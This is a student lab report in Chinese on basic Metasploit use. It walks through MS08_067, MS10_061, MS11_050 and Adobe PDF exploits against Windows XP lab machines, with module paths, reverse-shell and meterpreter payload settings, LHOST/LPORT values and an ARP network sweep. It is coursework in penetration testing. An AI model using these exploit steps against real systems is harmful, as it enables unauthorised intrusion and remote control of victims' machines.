20145320 《网络渗透》MSF基础应用
20145320 《网络渗透》MSF基础应用
1.实验后回答问题
exploit
- 攻击模块,利用发现的安全漏洞或配置弱点对远程目标系统进行攻击。主要分为主动攻击和被动攻击。像我们这次做的实验中,第一个是主动攻击,第二三个均属于被动攻击。
payload
- 攻击载荷模块,这个模块实质是一段shellcode。在渗透成功之后,将程序流程劫持并跳转入这段机器代码中执行
encode
- 编码器模块,首先是确保不会出现“坏字符”(如0x00字符串尾部,会截断后面的内容)。其次是“免杀”,防止受到杀毒软件的阻断!
2.实验总结与体会
这几个实验我发现就是在使用exploit攻击模块中不同的攻击方法进行攻击,而且流程基本都一样。先使用search exploit/windows/smb/ms找到windows中的漏洞,然后看看其简单的描述,选中其中一个使用info xxx查看其信息,主要看其可攻击targets、描述、必须设置的参数。接下来设置payload,同时设置payload的参数,所有的参数都设置完毕之后就可以进行exploit攻击了!总的来说就是在使用metaspolit这个软件提供的攻击服务!!
在完成老师安排的任务之外,我还尝试了:
ms06_066_nwapi

只差一步可恶!
下面这个是成功的!!!
MS10_061远程漏洞攻击(主动攻击)
```进入攻击模块
```info```查看

等级Excellent,发布时间2010-09-14

目标机器:所有的windows平台

需要设置参数:目标地址和端口,可选:目标共享打印机名

描述:打印机漏洞
被进攻的机器为Windows xp中文版
其中xp中要有共享打印机,具体做法
1、在控制面板中的---打印机和传真---下有默认的Microsoft打印机,但好像并不好用(可以尝试下直接改属性---端口为COM1试试)。
2、VMware提供虚拟打印机,在com1口。
3、删掉了默认的打印机(自愿),然后,添加打印机---连接到次计算机的本地打印机(去掉勾选的自动检测)---COM1口(VMware中查看即可)---打印机厂商默认即可---打印机名---共享---位置随意可不填
4、重启print Spooler服务(不重启可能导致meta连接打印机失败)
回到Linux中,设置相关参数后(要注意:set PNAME 为目标打印机name),exploit攻击成功!

要攻击一个有漏洞的主机简直不过太简单了!!!我感觉修复一个漏洞所需要的时间还没有使用这个漏洞拿来攻击所花费的时间长!!以后有补丁真的马上安装,我再也不敢拖了。真的害怕!
#3.实践过程记录
##MS08_067远程漏洞攻击实践
输入命令use exploit/windows/smb/ms08_067_netapi,```info```了解该漏洞模块的使用。

windows平台,等级great,补丁发布时间2008-10-28

可攻击的目标:windows 2003

需要设置的参数目标地址(RHOST)、目标端口(RPORT)、使用管道(SMBPIPE)

描述如上
输入命令```show payloads```会显示出有效的攻击载荷,如下图所示,我们找到一个shell_reverse_tcp。

使用命令set payload generic/shell_reverse_tcp设置攻击有效载荷。
根据```show options```中必须设置的东西进行设置

输入命令exploit开始攻击,轻而易举的正常攻击成功

中途我对老师给的中文版的windows xp进行攻击,以为成功了,没想到看了同学的博客发现是白开心一场

##MS11-050漏洞攻击
同上述步骤,第一步,查找相关漏洞信息

平台winodows,等级Normal,补丁发布时间2011-06-16

可攻击的目标:XP或Vista的IE7和IE8

必须的参数:反弹地址(SRVHOST)、反弹端口(SRVPORT)

描述
使用```show payloads```指令查看可以使用的负载

加载payload
set payload windows/meterpreter/reverese_http
设置相应参数,通过show options查看
set URIPATH ms5320 //设置访问主页的URI
set LHOST 192.168.47.130 //设置攻击IP
set LPORT 8888 //设置攻击端口
打开服务exploit,发起渗透攻击

此时,在靶机中启动IE 7浏览器,访问链接:http://192.168.47.130:8080/ms5320;

与此同时,在攻击机的MSF终端中,可以看到如下信息:

输入```sessions```可以看见正在监听端的活动会话

发现1端口正在监听,使用```session -i 1```接入ID号为1的当前靶机回连的会话

攻击成功!
##Adobe渗透测试过程
这个渗透攻击模块的路径为```windows/fileformat/adobe_cooltype_sing```,使用```info```查看该模块的内容


可以看到这个漏洞是存在于8.2.4和9.3.4版本的Adobe Reader中,于2010-09-07发布的补丁,等级是Great。
我们进入该模块设定相关系数并生成相关文件5320.pdf



将生成的pdf文件导入到windows XP Attacker靶机中运行,回连成功!

这个这个pdf的内容,内容并不可疑!

##辅助模块
先手动创建一个msf所需的数据库
输入命令 use auxiliary/scanner/discovery/arp_sweep进入模块
show options查看需要设置的消息,其中rhosts填写自己电脑所在网段
设置必要参数
set RHOSTS 172.30.1.0/21
set threads 2
命令run开启扫描,结果可以看到除了自己主机的IP,还有其他ip

20145320 《网络渗透》MSF基础应用的更多相关文章
- 20145319 《网络渗透》MSF基础应用
20145319 <网络渗透>MSF基础应用 一 实验链接 渗透实验一:MS08_067渗透实验 渗透实验二:MS11_050渗透实验 渗透实验三:Adobe阅读器渗透实验 渗透实验四:M ...
- 2018-2019 20165237网络对抗 Exp5 MSF基础应用
2018-2019 20165237网络对抗 Exp5 MSF基础应用 实验目标 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如 ...
- 2018-2019-2 20165234 《网络对抗技术》 Exp5 MSF基础应用
实验五 MSF基础应用 实验内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.一个主动攻击实践,ms08_067(成功) 2. 一个针对浏览器 ...
- 2018-2019 20165221 网络对抗 Exp5 MSF基础
2018-2019 20165221 网络对抗 Exp5 MSF基础 实践内容: 重点掌握metassploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如ms0 ...
- 2018-2019-2 20165206 网络攻防技术 Exp5 MSF基础应用
- 2018-2019-2 20165206<网络攻防技术>Exp5 MSF基础应用 - 实验任务 1.1一个主动攻击实践,如ms08_067; (1分) 1.2 一个针对浏览器的攻击,如 ...
- 2018-2019 20165235 网络对抗 Exp5 MSF基础
2018-2019 20165235 网络对抗 Exp5 MSF基础 1. 实践内容(3.5分) 1.1一个主动攻击实践 攻击方:kali 192.168.21.130 靶机: win7 192.16 ...
- 2018-2019-2 20165311《网络对抗技术》Exp5 MSF基础应用
<网络对抗技术>Exp5 MSF基础应用 实验目的 实验内容 一个主动攻击实践(ms08_067) 一个针对浏览器的攻击(ms11_050) 一个针对客户端的攻击(adobe_toolbu ...
- 2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用
2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用 一.原理与实践说明 1.实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具 ...
- 2018-2019-2 网络对抗技术 20165225 Exp5 MSF基础应用
2018-2019-2 网络对抗技术 20165225 Exp5 MSF基础应用 验前准备 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻 ...
随机推荐
- Java编写email实现内容换行
用java编写的发送邮件要使用<br>来实现换行,而不能使用\n,或者\r\n // 5. Content: 邮件正文(可以使用html标签)(内容有广告嫌疑,避免被邮件服务器误认为是滥发 ...
- iOS 第三方框架-Masonry
介绍地址:http://www.cocoachina.com/ios/20141219/10702.html 官网:https://github.com/SnapKit/Masonry 记住:一定要先 ...
- java 运行时异常与非运行时异常理解
参考:https://blog.csdn.net/lan12334321234/article/details/70049446 所谓的异常就是阻止当前程序或方法继续执行的问题 java异常分为两种: ...
- 39.css3----button按钮点击时出现蓝色边框
css控制Button 按钮的点击时候出现蓝色边框http://www.inbeijing.org/archives/1139 Button 按钮的点击时候出现蓝色边框的问题 添加css属性,这样在点 ...
- HDU 2254 奥运(矩阵+二分等比求和)
奥运 [题目链接]奥运 [题目类型]矩阵+二分等比求和 &题解: 首先离散化城市,之后就是矩阵快速幂了,但让求的是A^(t1)+A^(t1+1)+...+A^(t2),我先想的是打表,但时间真 ...
- train_val.prototxt文件和deploy.prototxt文件开头的区别
1.开头不同 对train_val.prototxt文件来说,开头部分定义训练和测试的网络及参数 对deploy.prototxt文件来说,开头部分定义实际运用场景的配置文件,其参数不定义数据来源,仅 ...
- caffe中通过prototxt文件查看神经网络模型结构的方法
在修改propotxt之前我们可以对之前的网络结构进行一个直观的认识: 可以使用http://ethereon.github.io/netscope/#/editor 这个网址. 将propotxt文 ...
- ubuntu安装python-mysqldb
前期准备: sudo apt-get install libmysqld-dev sudo apt-get install libmysqlclient-dev sudo apt-get insta ...
- 原型设计模式 Prototype
参考1 http://www.cnblogs.com/libingql/p/3633377.html http://www.cnblogs.com/promise-7/archive/2012/06/ ...
- 【CDH学习之三】CDH安装
登录CM 1.版本选择 免费版本的CM5已经去除50个节点数量的限制. 各个Agent节点正常启动后,可以在当前管理的主机列表中看到对应的节点. 选择要安装的节点,点继续. 接下来,出现以下包名,说明 ...